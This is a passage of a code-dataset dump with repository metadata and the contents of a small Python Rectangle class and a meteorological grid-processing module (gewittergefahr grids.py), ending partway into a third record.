blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
533149ed9a8326403f4b55c07064105b91edd0f3 | 11b503cd75f546465eb7d7e436f88587a0fa8596 | /calculating_area.py | 618867a889ea6bfff8a28d94fcf0c46859bf78f1 | [] | no_license | ibnahmadCoded/how_to_think_like_a_computer_scientist_Chapter_11 | d36074d71f5df92dfab864e827ba0968ee10d07e | e3fa08a5b64b62700a9590e2fff3c5c2d762a6f8 | refs/heads/master | 2022-04-17T01:30:57.788470 | 2020-04-15T20:08:11 | 2020-04-15T20:08:11 | 256,024,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | from study import *
class Rectangle:
    """An axis-aligned rectangle anchored at a corner point.

    The corner may be any object exposing mutable ``x`` and ``y``
    attributes (e.g. a Point from the study module).
    """

    def __init__(self, posn, w, h):
        """Create a rectangle at corner ``posn`` with width ``w``, height ``h``."""
        self.corner = posn
        self.width = w
        self.height = h

    def __str__(self):
        # Render as "(corner, width, height)"; the corner supplies its own str().
        return "({0}, {1}, {2})".format(self.corner, self.width,
                                        self.height)

    def grow(self, delta_width, delta_height):
        """Resize this rectangle in place (negative deltas shrink it)."""
        self.width = self.width + delta_width
        self.height = self.height + delta_height

    def move(self, dx, dy):
        """Translate this rectangle's corner in place by (dx, dy)."""
        self.corner.x = self.corner.x + dx
        self.corner.y = self.corner.y + dy

    def area(self):
        """Return the area (width times height) of this rectangle."""
        return self.width * self.height
| [
"alegeaa@yahoo.com"
] | alegeaa@yahoo.com |
55d10f08476cafe3b6a8acb282b1442abec586be | f41471a3bff66c763b8d60f0280ac67235ecbb62 | /gewittergefahr/gg_utils/grids.py | 86d7c33b62c1998a09b3280b4341deb136f8433a | [
"MIT"
] | permissive | cil0834/GewitterGefahr | 0f43878ba40921881c077c2218446f5fab18ba9f | 699b995b1b90344022b1644d4b758e790402894e | refs/heads/master | 2020-06-23T15:59:22.718914 | 2019-07-24T03:59:31 | 2019-07-24T03:59:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,443 | py | """Processing methods for gridded data.
DEFINITIONS
"Grid point" = center of grid cell (as opposed to edges of the grid cell).
"""
import numpy
from gewittergefahr.gg_utils import general_utils
from gewittergefahr.gg_utils import longitude_conversion as lng_conversion
from gewittergefahr.gg_utils import projections
from gewittergefahr.gg_utils import error_checking
# One degree of latitude = 60 nautical miles; 1852 metres per nautical mile.
DEGREES_LAT_TO_METRES = 60 * 1852
DEGREES_TO_RADIANS = numpy.pi / 180

# Keys of the dictionary returned by `get_latlng_grid_points_in_radius`.
GRID_POINT_X_MATRIX_KEY = 'grid_point_x_matrix_metres'
GRID_POINT_Y_MATRIX_KEY = 'grid_point_y_matrix_metres'
PROJECTION_OBJECT_KEY = 'projection_object'
def _check_input_events(
        event_x_coords_metres, event_y_coords_metres, integer_event_ids):
    """Error-checks event inputs for `count_events_on_equidistant_grid`.

    :param event_x_coords_metres: See doc for
        `count_events_on_equidistant_grid`.
    :param event_y_coords_metres: Same.
    :param integer_event_ids: Same.
    """

    error_checking.assert_is_numpy_array_without_nan(event_x_coords_metres)
    error_checking.assert_is_numpy_array(
        event_x_coords_metres, num_dimensions=1)

    # All event arrays must share the same length.
    these_expected_dim = numpy.array([len(event_x_coords_metres)])

    error_checking.assert_is_numpy_array_without_nan(event_y_coords_metres)
    error_checking.assert_is_numpy_array(
        event_y_coords_metres, exact_dimensions=these_expected_dim)

    if integer_event_ids is None:
        return

    error_checking.assert_is_integer_numpy_array(integer_event_ids)
    error_checking.assert_is_numpy_array(
        integer_event_ids, exact_dimensions=these_expected_dim)
def get_xy_grid_points(x_min_metres=None, y_min_metres=None,
                       x_spacing_metres=None, y_spacing_metres=None,
                       num_rows=None, num_columns=None):
    """Generates unique x- and y-coordinates of points in a regular x-y grid.

    M = number of rows in grid
    N = number of columns in grid

    :param x_min_metres: Minimum x-coordinate over all grid points.
    :param y_min_metres: Minimum y-coordinate over all grid points.
    :param x_spacing_metres: Spacing between adjacent grid points in the
        x-direction (equivalently, the width of each grid cell).
    :param y_spacing_metres: Spacing between adjacent grid points in the
        y-direction (equivalently, the height of each grid cell).
    :param num_rows: Number of rows (unique grid-point y-values) in grid.
    :param num_columns: Number of columns (unique grid-point x-values) in grid.
    :return: grid_point_x_metres: length-N numpy array with x-coordinates of
        grid points.
    :return: grid_point_y_metres: length-M numpy array with y-coordinates of
        grid points.
    """

    error_checking.assert_is_not_nan(x_min_metres)
    error_checking.assert_is_not_nan(y_min_metres)
    error_checking.assert_is_greater(x_spacing_metres, 0.)
    error_checking.assert_is_greater(y_spacing_metres, 0.)
    error_checking.assert_is_integer(num_rows)
    error_checking.assert_is_greater(num_rows, 0)
    error_checking.assert_is_integer(num_columns)
    error_checking.assert_is_greater(num_columns, 0)

    def _axis_coords(min_coord_metres, spacing_metres, num_points):
        # Evenly spaced coordinates along one axis, starting at the minimum.
        return numpy.linspace(
            min_coord_metres,
            min_coord_metres + (num_points - 1) * spacing_metres,
            num=num_points)

    return (_axis_coords(x_min_metres, x_spacing_metres, num_columns),
            _axis_coords(y_min_metres, y_spacing_metres, num_rows))
def get_latlng_grid_points(min_latitude_deg=None, min_longitude_deg=None,
                           lat_spacing_deg=None, lng_spacing_deg=None,
                           num_rows=None, num_columns=None):
    """Generates unique lats and lngs of points in a regular lat-long grid.

    M = number of rows in grid
    N = number of columns in grid

    :param min_latitude_deg: Minimum latitude over all grid points (deg N).
    :param min_longitude_deg: Minimum longitude over all grid points (deg E).
    :param lat_spacing_deg: Meridional (N-S) spacing between adjacent grid
        points.
    :param lng_spacing_deg: Zonal (E-W) spacing between adjacent grid points.
    :param num_rows: Number of rows (unique grid-point latitudes) in grid.
    :param num_columns: Number of columns (unique grid-point longitudes) in
        grid.
    :return: grid_point_latitudes_deg: length-M numpy array with latitudes of
        grid points (deg N).
    :return: grid_point_longitudes_deg: length-N numpy array with longitudes of
        grid points (deg E).
    """

    error_checking.assert_is_valid_latitude(min_latitude_deg)

    # Normalize longitude to the positive-in-west convention used module-wide.
    min_longitude_deg = lng_conversion.convert_lng_positive_in_west(
        min_longitude_deg, allow_nan=False)

    error_checking.assert_is_greater(lat_spacing_deg, 0.)
    error_checking.assert_is_greater(lng_spacing_deg, 0.)
    error_checking.assert_is_integer(num_rows)
    error_checking.assert_is_greater(num_rows, 0)
    error_checking.assert_is_integer(num_columns)
    error_checking.assert_is_greater(num_columns, 0)

    def _axis_coords(min_coord_deg, spacing_deg, num_points):
        # Evenly spaced coordinates along one axis, starting at the minimum.
        return numpy.linspace(
            min_coord_deg,
            min_coord_deg + (num_points - 1) * spacing_deg,
            num=num_points)

    return (_axis_coords(min_latitude_deg, lat_spacing_deg, num_rows),
            _axis_coords(min_longitude_deg, lng_spacing_deg, num_columns))
def get_xy_grid_cell_edges(x_min_metres=None, y_min_metres=None,
                           x_spacing_metres=None, y_spacing_metres=None,
                           num_rows=None, num_columns=None):
    """Generates unique x- and y-coords of grid-cell edges in regular x-y grid.

    M = number of rows in grid
    N = number of columns in grid

    :param x_min_metres: See documentation for get_xy_grid_points.
    :param y_min_metres: Same.
    :param x_spacing_metres: Same.
    :param y_spacing_metres: Same.
    :param num_rows: Same.
    :param num_columns: Same.
    :return: grid_cell_edge_x_metres: length-(N + 1) numpy array with
        x-coordinates of grid-cell edges.
    :return: grid_cell_edge_y_metres: length-(M + 1) numpy array with
        y-coordinates of grid-cell edges.
    """

    grid_point_x_metres, grid_point_y_metres = get_xy_grid_points(
        x_min_metres=x_min_metres, y_min_metres=y_min_metres,
        x_spacing_metres=x_spacing_metres, y_spacing_metres=y_spacing_metres,
        num_rows=num_rows, num_columns=num_columns)

    def _points_to_edges(point_coords_metres, spacing_metres):
        # Near edge of every cell, plus the far edge of the last cell.
        half_spacing_metres = spacing_metres / 2
        return numpy.concatenate((
            point_coords_metres - half_spacing_metres,
            point_coords_metres[[-1]] + half_spacing_metres))

    return (_points_to_edges(grid_point_x_metres, x_spacing_metres),
            _points_to_edges(grid_point_y_metres, y_spacing_metres))
def get_latlng_grid_cell_edges(min_latitude_deg=None, min_longitude_deg=None,
                               lat_spacing_deg=None, lng_spacing_deg=None,
                               num_rows=None, num_columns=None):
    """Generates unique lat and lng of grid-cell edges in regular lat-lng grid.

    M = number of rows in grid
    N = number of columns in grid

    :param min_latitude_deg: See documentation for get_latlng_grid_points.
    :param min_longitude_deg: Same.
    :param lat_spacing_deg: Same.
    :param lng_spacing_deg: Same.
    :param num_rows: Same.
    :param num_columns: Same.
    :return: grid_cell_edge_latitudes_deg: length-(M + 1) numpy array with
        latitudes of grid-cell edges (deg N).
    :return: grid_cell_edge_longitudes_deg: length-(N + 1) numpy array with
        longitudes of grid-cell edges (deg E).
    """

    (grid_point_latitudes_deg,
     grid_point_longitudes_deg) = get_latlng_grid_points(
        min_latitude_deg=min_latitude_deg, min_longitude_deg=min_longitude_deg,
        lat_spacing_deg=lat_spacing_deg, lng_spacing_deg=lng_spacing_deg,
        num_rows=num_rows, num_columns=num_columns)

    def _points_to_edges(point_coords_deg, spacing_deg):
        # Near edge of every cell, plus the far edge of the last cell.
        half_spacing_deg = spacing_deg / 2
        return numpy.concatenate((
            point_coords_deg - half_spacing_deg,
            point_coords_deg[[-1]] + half_spacing_deg))

    return (_points_to_edges(grid_point_latitudes_deg, lat_spacing_deg),
            _points_to_edges(grid_point_longitudes_deg, lng_spacing_deg))
def xy_vectors_to_matrices(x_unique_metres, y_unique_metres):
    """For regular x-y grid, converts vectors of x- and y-coords to matrices.

    Works for coordinates of either grid points or grid-cell edges.

    M = number of rows in grid
    N = number of columns in grid

    :param x_unique_metres: length-N numpy array with x-coordinates of either
        grid points or grid-cell edges.
    :param y_unique_metres: length-M numpy array with y-coordinates of either
        grid points or grid-cell edges.
    :return: x_matrix_metres: M-by-N numpy array, where every row equals
        x_unique_metres.
    :return: y_matrix_metres: M-by-N numpy array, where every column equals
        y_unique_metres.
    """

    error_checking.assert_is_numpy_array_without_nan(x_unique_metres)
    error_checking.assert_is_numpy_array(x_unique_metres, num_dimensions=1)
    error_checking.assert_is_numpy_array_without_nan(y_unique_metres)
    error_checking.assert_is_numpy_array(y_unique_metres, num_dimensions=1)

    # meshgrid's default ("xy") indexing yields exactly the desired layout.
    x_matrix_metres, y_matrix_metres = numpy.meshgrid(
        x_unique_metres, y_unique_metres)
    return x_matrix_metres, y_matrix_metres
def latlng_vectors_to_matrices(unique_latitudes_deg, unique_longitudes_deg):
    """Converts vectors of latitude and longitude coordinates to matrices.

    Works only for a regular lat-long grid, with coordinates of either grid
    points or grid-cell edges.

    M = number of rows in grid
    N = number of columns in grid

    :param unique_latitudes_deg: length-M numpy array with latitudes (deg N) of
        either grid points or grid-cell edges.
    :param unique_longitudes_deg: length-N numpy array with longitudes (deg E)
        of either grid points or grid-cell edges.
    :return: latitude_matrix_deg: M-by-N numpy array, where every column equals
        unique_latitudes_deg.
    :return: longitude_matrix_deg: M-by-N numpy array, where every row equals
        unique_longitudes_deg.
    """

    error_checking.assert_is_valid_lat_numpy_array(unique_latitudes_deg)
    error_checking.assert_is_numpy_array(unique_latitudes_deg, num_dimensions=1)
    error_checking.assert_is_numpy_array(unique_longitudes_deg,
                                         num_dimensions=1)

    # Normalize longitudes to the positive-in-west convention.
    unique_longitudes_deg = lng_conversion.convert_lng_positive_in_west(
        unique_longitudes_deg, allow_nan=False)

    longitude_matrix_deg, latitude_matrix_deg = numpy.meshgrid(
        unique_longitudes_deg, unique_latitudes_deg)
    return latitude_matrix_deg, longitude_matrix_deg
def xy_field_grid_points_to_edges(field_matrix=None, x_min_metres=None,
                                  y_min_metres=None, x_spacing_metres=None,
                                  y_spacing_metres=None):
    """Re-references x-y field from grid points to grid-cell edges.

    M = number of rows (unique grid-point y-coordinates)
    N = number of columns (unique grid-point x-coordinates)

    :param field_matrix: M-by-N numpy array with values of some variable
        (examples: temperature, radar reflectivity, etc.).  y should increase
        while traveling down a column, and x should increase while traveling
        right across a row.
    :param x_min_metres: Minimum x-coordinate over all grid points.
    :param y_min_metres: Minimum y-coordinate over all grid points.
    :param x_spacing_metres: Spacing between adjacent grid points in
        x-direction.
    :param y_spacing_metres: Spacing between adjacent grid points in
        y-direction.
    :return: field_matrix: Same as input, except that dimensions are now
        (M + 1) by (N + 1).  The last row and last column contain only NaN's.
    :return: grid_cell_edge_x_metres: length-(N + 1) numpy array with
        x-coordinates of grid-cell edges.
    :return: grid_cell_edge_y_metres: length-(M + 1) numpy array with
        y-coordinates of grid-cell edges.
    """

    error_checking.assert_is_real_numpy_array(field_matrix)
    error_checking.assert_is_numpy_array(field_matrix, num_dimensions=2)

    num_rows, num_columns = field_matrix.shape

    grid_cell_edge_x_metres, grid_cell_edge_y_metres = get_xy_grid_cell_edges(
        x_min_metres=x_min_metres, y_min_metres=y_min_metres,
        x_spacing_metres=x_spacing_metres, y_spacing_metres=y_spacing_metres,
        num_rows=num_rows, num_columns=num_columns)

    # Pad with one NaN row (bottom) and one NaN column (right), so the field
    # matrix matches the (M + 1)-by-(N + 1) edge coordinates.
    field_matrix = numpy.vstack(
        (field_matrix, numpy.full((1, num_columns), numpy.nan)))
    field_matrix = numpy.hstack(
        (field_matrix, numpy.full((num_rows + 1, 1), numpy.nan)))

    return field_matrix, grid_cell_edge_x_metres, grid_cell_edge_y_metres
def latlng_field_grid_points_to_edges(
        field_matrix=None, min_latitude_deg=None, min_longitude_deg=None,
        lat_spacing_deg=None, lng_spacing_deg=None):
    """Re-references lat-long field from grid points to grid-cell edges.

    M = number of rows (unique grid-point latitudes)
    N = number of columns (unique grid-point longitudes)

    :param field_matrix: M-by-N numpy array with values of some variable
        (examples: temperature, radar reflectivity, etc.).  Latitude should
        increase while traveling down a column, and longitude should increase
        while traveling right across a row.
    :param min_latitude_deg: See documentation for get_latlng_grid_points.
    :param min_longitude_deg: Same.
    :param lat_spacing_deg: Same.
    :param lng_spacing_deg: Same.
    :return: field_matrix: Same as input, except that dimensions are now
        (M + 1) by (N + 1).  The last row and last column contain only NaN's.
    :return: grid_cell_edge_latitudes_deg: length-(M + 1) numpy array with
        latitudes of grid-cell edges (deg N).
    :return: grid_cell_edge_longitudes_deg: length-(N + 1) numpy array with
        longitudes of grid-cell edges (deg E).
    """

    error_checking.assert_is_real_numpy_array(field_matrix)
    error_checking.assert_is_numpy_array(field_matrix, num_dimensions=2)

    num_rows, num_columns = field_matrix.shape

    (grid_cell_edge_latitudes_deg,
     grid_cell_edge_longitudes_deg) = get_latlng_grid_cell_edges(
        min_latitude_deg=min_latitude_deg, min_longitude_deg=min_longitude_deg,
        lat_spacing_deg=lat_spacing_deg, lng_spacing_deg=lng_spacing_deg,
        num_rows=num_rows, num_columns=num_columns)

    # Pad with one NaN row (bottom) and one NaN column (right), so the field
    # matrix matches the (M + 1)-by-(N + 1) edge coordinates.
    field_matrix = numpy.vstack(
        (field_matrix, numpy.full((1, num_columns), numpy.nan)))
    field_matrix = numpy.hstack(
        (field_matrix, numpy.full((num_rows + 1, 1), numpy.nan)))

    return (field_matrix, grid_cell_edge_latitudes_deg,
            grid_cell_edge_longitudes_deg)
def extract_latlng_subgrid(
        data_matrix, grid_point_latitudes_deg, grid_point_longitudes_deg,
        center_latitude_deg, center_longitude_deg,
        max_distance_from_center_metres):
    """Extracts subset of lat-long grid, centered at a given point.

    M = number of rows (grid-point latitudes) in full grid
    N = number of columns (grid-point longitudes) in full grid
    m = number of rows (grid-point latitudes) in sub-grid
    n = number of columns (grid-point longitudes) in sub-grid

    WARNING: the returned sub-grid is a *view* into `data_matrix` (created by
    basic numpy slicing), so the NaN-masking of distant grid points below also
    modifies the input array in place.

    Distances are computed with an equirectangular approximation (degrees of
    longitude scaled by cos of the centre latitude), not true geodesics.

    :param data_matrix: M-by-N numpy array with data values.
    :param grid_point_latitudes_deg: length-M numpy array of grid-point
        latitudes (deg N).  grid_point_latitudes_deg[i] is the latitude
        everywhere in the [i]th row of data_matrix.
    :param grid_point_longitudes_deg: length-N numpy array of grid-point
        longitudes (deg E).  grid_point_longitudes_deg[j] is the longitude
        everywhere in the [j]th column of data_matrix.
    :param center_latitude_deg: Latitude (deg N) of target point, around which
        the sub-grid will be centered.
    :param center_longitude_deg: Longitude (deg E) of target point, around
        which the sub-grid will be centered.
    :param max_distance_from_center_metres: Max distance of any grid point from
        target point.  Values at more distant grid points will be changed to
        NaN.
    :return: subgrid_data_matrix: m-by-n numpy array of data values (a view
        into `data_matrix`).
    :return: valid_row_indices: length-m numpy array.  If valid_row_indices[i]
        = k, the [i]th row in the subgrid = [k]th row in the full grid.
    :return: valid_column_indices: length-n numpy array.  Same but for columns.
    """

    # Convert the search radius to degrees of latitude.
    max_latitude_diff_deg = (
        max_distance_from_center_metres / DEGREES_LAT_TO_METRES
    )

    # Metres per degree of longitude shrinks with cos(latitude).
    degrees_lng_to_metres = DEGREES_LAT_TO_METRES * numpy.cos(
        center_latitude_deg * DEGREES_TO_RADIANS
    )
    max_longitude_diff_deg = (
        max_distance_from_center_metres / degrees_lng_to_metres
    )

    # Bounding box (in degrees) guaranteed to contain the search circle.
    min_latitude_deg = center_latitude_deg - max_latitude_diff_deg
    max_latitude_deg = center_latitude_deg + max_latitude_diff_deg
    min_longitude_deg = center_longitude_deg - max_longitude_diff_deg
    max_longitude_deg = center_longitude_deg + max_longitude_diff_deg

    # Rows/columns of the full grid that fall inside the bounding box.
    valid_row_flags = numpy.logical_and(
        grid_point_latitudes_deg >= min_latitude_deg,
        grid_point_latitudes_deg <= max_latitude_deg)
    valid_row_indices = numpy.where(valid_row_flags)[0]
    min_valid_row_index = numpy.min(valid_row_indices)
    max_valid_row_index = numpy.max(valid_row_indices)

    valid_column_flags = numpy.logical_and(
        grid_point_longitudes_deg >= min_longitude_deg,
        grid_point_longitudes_deg <= max_longitude_deg)
    valid_column_indices = numpy.where(valid_column_flags)[0]
    min_valid_column_index = numpy.min(valid_column_indices)
    max_valid_column_index = numpy.max(valid_column_indices)

    # Basic slicing: this is a view into data_matrix, not a copy.
    subgrid_data_matrix = data_matrix[
        min_valid_row_index:(max_valid_row_index + 1),
        min_valid_column_index:(max_valid_column_index + 1)
    ]

    # Lat/long of every point in the sub-grid, as full 2-D matrices.
    subgrid_lat_matrix_deg, subgrid_lng_matrix_deg = (
        latlng_vectors_to_matrices(
            unique_latitudes_deg=grid_point_latitudes_deg[valid_row_indices],
            unique_longitudes_deg=grid_point_longitudes_deg[
                valid_column_indices]
        )
    )

    # Equirectangular distance from each sub-grid point to the target point.
    lat_distance_matrix_metres = DEGREES_LAT_TO_METRES * (
        subgrid_lat_matrix_deg - center_latitude_deg
    )
    lng_distance_matrix_metres = degrees_lng_to_metres * (
        subgrid_lng_matrix_deg - center_longitude_deg
    )
    distance_matrix_metres = numpy.sqrt(
        lat_distance_matrix_metres ** 2 + lng_distance_matrix_metres ** 2
    )

    # Mask points inside the bounding box but outside the search circle.
    # NOTE: since subgrid_data_matrix is a view, this mutates data_matrix too.
    subgrid_data_matrix[
        distance_matrix_metres > max_distance_from_center_metres
    ] = numpy.nan

    return subgrid_data_matrix, valid_row_indices, valid_column_indices
def count_events_on_equidistant_grid(
        event_x_coords_metres, event_y_coords_metres,
        grid_point_x_coords_metres, grid_point_y_coords_metres,
        integer_event_ids=None, effective_radius_metres=None):
    """Counts number of events in, or near, each cell of an equidistant grid.

    M = number of rows (unique grid-point y-coordinates)
    N = number of columns (unique grid-point x-coordinates)
    K = number of events

    :param event_x_coords_metres: length-K numpy array with x-coordinates of
        events.
    :param event_y_coords_metres: length-K numpy array with y-coordinates of
        events.
    :param grid_point_x_coords_metres: length-N numpy array with unique
        x-coordinates at grid points.
    :param grid_point_y_coords_metres: length-M numpy array with unique
        y-coordinates at grid points.
    :param integer_event_ids: length-K numpy array of event IDs (integers).
        Each event ID will be counted only once per grid cell.  If
        `integer_event_ids is None`, will assume that each location in
        `event_x_coords_metres` and `event_y_coords_metres` comes from a unique
        event.
    :param effective_radius_metres: If None, will count the number of events
        inside each grid cell.  If specified, will count the number of events
        within `effective_radius_metres` of each grid point.
    :return: num_events_matrix:
        [if `effective_radius_metres is None`]
        M-by-N numpy array, where element [i, j] is the number of events in
        grid cell [i, j].
        [if `effective_radius_metres is not None`]
        M-by-N numpy array, where element [i, j] is the number of events within
        `effective_radius_metres` of grid point [i, j].
    :return: event_ids_by_grid_cell_dict: Dictionary, where key [i, j] is a 1-D
        numpy array of event IDs assigned to grid cell [i, j].  If
        `integer_event_ids is None`, this will also be `None`.
    """

    # --- Input validation ---
    _check_input_events(
        event_x_coords_metres=event_x_coords_metres,
        event_y_coords_metres=event_y_coords_metres,
        integer_event_ids=integer_event_ids)
    error_checking.assert_is_numpy_array_without_nan(grid_point_x_coords_metres)
    error_checking.assert_is_numpy_array(
        grid_point_x_coords_metres, num_dimensions=1)
    error_checking.assert_is_numpy_array_without_nan(grid_point_y_coords_metres)
    error_checking.assert_is_numpy_array(
        grid_point_y_coords_metres, num_dimensions=1)
    if effective_radius_metres is not None:
        error_checking.assert_is_greater(effective_radius_metres, 0.)

        # Squared radius, so distances below can be compared without sqrt.
        effective_radius_metres2 = effective_radius_metres ** 2

    # Full 2-D coordinate matrices (used only in the radius-based branch).
    (grid_point_x_matrix_metres, grid_point_y_matrix_metres
    ) = xy_vectors_to_matrices(x_unique_metres=grid_point_x_coords_metres,
                               y_unique_metres=grid_point_y_coords_metres)

    num_grid_rows = len(grid_point_y_coords_metres)
    num_grid_columns = len(grid_point_x_coords_metres)
    num_events_matrix = numpy.full(
        (num_grid_rows, num_grid_columns), 0, dtype=int)

    # When IDs are given, accumulate per-cell ID lists; counts are derived at
    # the end (after de-duplicating IDs within each cell).
    if integer_event_ids is None:
        event_ids_by_grid_cell_dict = None
    else:
        event_ids_by_grid_cell_dict = {}
        for i in range(num_grid_rows):
            for j in range(num_grid_columns):
                event_ids_by_grid_cell_dict[i, j] = []

    num_events = len(event_x_coords_metres)

    for k in range(num_events):
        # Progress message every 1000 events.
        if numpy.mod(k, 1000) == 0:
            print('Have assigned {0:d} of {1:d} events to grid cells...'.format(
                k, num_events))

        if effective_radius_metres is None:
            # Each event belongs to exactly one cell: the one whose grid point
            # is nearest in each coordinate separately.
            _, this_row = general_utils.find_nearest_value(
                grid_point_y_coords_metres, event_y_coords_metres[k])
            _, this_column = general_utils.find_nearest_value(
                grid_point_x_coords_metres, event_x_coords_metres[k])

            if integer_event_ids is None:
                num_events_matrix[this_row, this_column] += 1
            else:
                event_ids_by_grid_cell_dict[this_row, this_column].append(
                    integer_event_ids[k])

            continue

        # Radius-based branch: pre-filter rows/columns by the bounding square,
        # then apply the exact circular-distance test on that sub-matrix.
        these_rows_to_try = numpy.where(numpy.absolute(
            grid_point_y_coords_metres - event_y_coords_metres[k]
        ) <= effective_radius_metres)[0]

        these_columns_to_try = numpy.where(numpy.absolute(
            grid_point_x_coords_metres - event_x_coords_metres[k]
        ) <= effective_radius_metres)[0]

        this_x_submatrix_metres = grid_point_x_matrix_metres[
            these_rows_to_try[:, None], these_columns_to_try]
        this_y_submatrix_metres = grid_point_y_matrix_metres[
            these_rows_to_try[:, None], these_columns_to_try]

        # Squared Euclidean distance from event to each candidate grid point.
        this_distance_submatrix_metres2 = (
            (this_x_submatrix_metres - event_x_coords_metres[k]) ** 2 +
            (this_y_submatrix_metres - event_y_coords_metres[k]) ** 2)

        these_subrows, these_subcolumns = numpy.where(
            this_distance_submatrix_metres2 <= effective_radius_metres2)

        # Map sub-matrix indices back to full-grid indices.
        these_rows = these_rows_to_try[these_subrows]
        these_columns = these_columns_to_try[these_subcolumns]

        if integer_event_ids is None:
            num_events_matrix[these_rows, these_columns] += 1
        else:
            for m in range(len(these_rows)):
                event_ids_by_grid_cell_dict[
                    these_rows[m], these_columns[m]
                ].append(integer_event_ids[k])

    print('Have assigned all {0:d} events to grid cells!'.format(num_events))

    # De-duplicate IDs per cell, then derive counts from the unique-ID arrays.
    if integer_event_ids is not None:
        for i in range(num_grid_rows):
            for j in range(num_grid_columns):
                event_ids_by_grid_cell_dict[i, j] = numpy.array(
                    list(set(event_ids_by_grid_cell_dict[i, j])), dtype=int)
                num_events_matrix[i, j] = len(event_ids_by_grid_cell_dict[i, j])

    return num_events_matrix, event_ids_by_grid_cell_dict
def get_latlng_grid_points_in_radius(
        test_latitude_deg, test_longitude_deg, effective_radius_metres,
        grid_point_latitudes_deg=None, grid_point_longitudes_deg=None,
        grid_point_dict=None):
    """Finds lat-long grid points within radius of test point.

    One of the following sets of input args must be specified:

    - grid_point_latitudes_deg and grid_point_longitudes_deg
    - grid_point_dict (cheaper: reuses projected coordinates from a previous
      call instead of re-projecting the whole grid)

    M = number of rows (unique grid-point latitudes)
    N = number of columns (unique grid-point longitudes)
    K = number of grid points within radius of test point

    :param test_latitude_deg: Latitude (deg N) of test point.
    :param test_longitude_deg: Longitude (deg E) of test point.
    :param effective_radius_metres: Effective radius (will find all grid points
        within this radius of test point).
    :param grid_point_latitudes_deg: length-M numpy array with latitudes
        (deg N) of grid points.
    :param grid_point_longitudes_deg: length-N numpy array with longitudes
        (deg E) of grid points.
    :param grid_point_dict: Dictionary created by a previous run of this method
        (see output documentation).
    :return: rows_in_radius: length-K numpy array with row indices of grid
        points near test point.
    :return: columns_in_radius: Same but for columns.
    :return: grid_point_dict: Dictionary with the following keys.
    grid_point_dict['grid_point_x_matrix_metres']: M-by-N numpy array with
        x-coordinates of grid points.
    grid_point_dict['grid_point_y_matrix_metres']: M-by-N numpy array with
        y-coordinates of grid points.
    grid_point_dict['projection_object']: Instance of `pyproj.Proj`, which can
        be used to convert future test points from lat-long to x-y coordinates.
    """

    if grid_point_dict is None:
        # First call for this grid: project all grid points from lat-long to
        # x-y (azimuthal equidistant, centred on the grid's mean lat/long) and
        # cache the result for subsequent calls.
        (grid_point_lat_matrix_deg, grid_point_lng_matrix_deg
        ) = latlng_vectors_to_matrices(
            unique_latitudes_deg=grid_point_latitudes_deg,
            unique_longitudes_deg=grid_point_longitudes_deg)

        projection_object = projections.init_azimuthal_equidistant_projection(
            central_latitude_deg=numpy.mean(grid_point_latitudes_deg),
            central_longitude_deg=numpy.mean(grid_point_longitudes_deg))

        (grid_point_x_matrix_metres, grid_point_y_matrix_metres
        ) = projections.project_latlng_to_xy(
            latitudes_deg=grid_point_lat_matrix_deg,
            longitudes_deg=grid_point_lng_matrix_deg,
            projection_object=projection_object)

        grid_point_dict = {
            GRID_POINT_X_MATRIX_KEY: grid_point_x_matrix_metres,
            GRID_POINT_Y_MATRIX_KEY: grid_point_y_matrix_metres,
            PROJECTION_OBJECT_KEY: projection_object
        }

    error_checking.assert_is_valid_latitude(test_latitude_deg)
    error_checking.assert_is_geq(effective_radius_metres, 0.)

    # Project the test point with the same (cached) projection as the grid.
    test_longitude_deg = lng_conversion.convert_lng_positive_in_west(
        longitudes_deg=numpy.array([test_longitude_deg]), allow_nan=False)[0]

    (test_x_coords_metres, test_y_coords_metres
    ) = projections.project_latlng_to_xy(
        latitudes_deg=numpy.array([test_latitude_deg]),
        longitudes_deg=numpy.array([test_longitude_deg]),
        projection_object=grid_point_dict[PROJECTION_OBJECT_KEY])
    test_x_coord_metres = test_x_coords_metres[0]
    test_y_coord_metres = test_y_coords_metres[0]

    # Cheap pre-filter: keep grid points inside the bounding square, then
    # apply the exact Euclidean-distance test to those candidates only.
    valid_x_flags = numpy.absolute(
        grid_point_dict[GRID_POINT_X_MATRIX_KEY] - test_x_coord_metres
    ) <= effective_radius_metres
    valid_y_flags = numpy.absolute(
        grid_point_dict[GRID_POINT_Y_MATRIX_KEY] - test_y_coord_metres
    ) <= effective_radius_metres

    rows_to_try, columns_to_try = numpy.where(numpy.logical_and(
        valid_x_flags, valid_y_flags))

    distances_to_try_metres = numpy.sqrt(
        (grid_point_dict[GRID_POINT_X_MATRIX_KEY][rows_to_try, columns_to_try] -
         test_x_coord_metres) ** 2 +
        (grid_point_dict[GRID_POINT_Y_MATRIX_KEY][rows_to_try, columns_to_try] -
         test_y_coord_metres) ** 2)

    valid_indices = numpy.where(
        distances_to_try_metres <= effective_radius_metres)[0]

    return (rows_to_try[valid_indices], columns_to_try[valid_indices],
            grid_point_dict)
| [
"ryan.lagerquist@ou.edu"
] | ryan.lagerquist@ou.edu |
24de53dffd739ed57c77fd62b1677df51626a41a | 29b6a856a81a47ebab7bfdba7fe8a7b845123c9e | /dingtalk/python/alibabacloud_dingtalk/storage_2_0/models.py | 2360bec5165bb4960cbddf11ed58797cd78577d6 | [
"Apache-2.0"
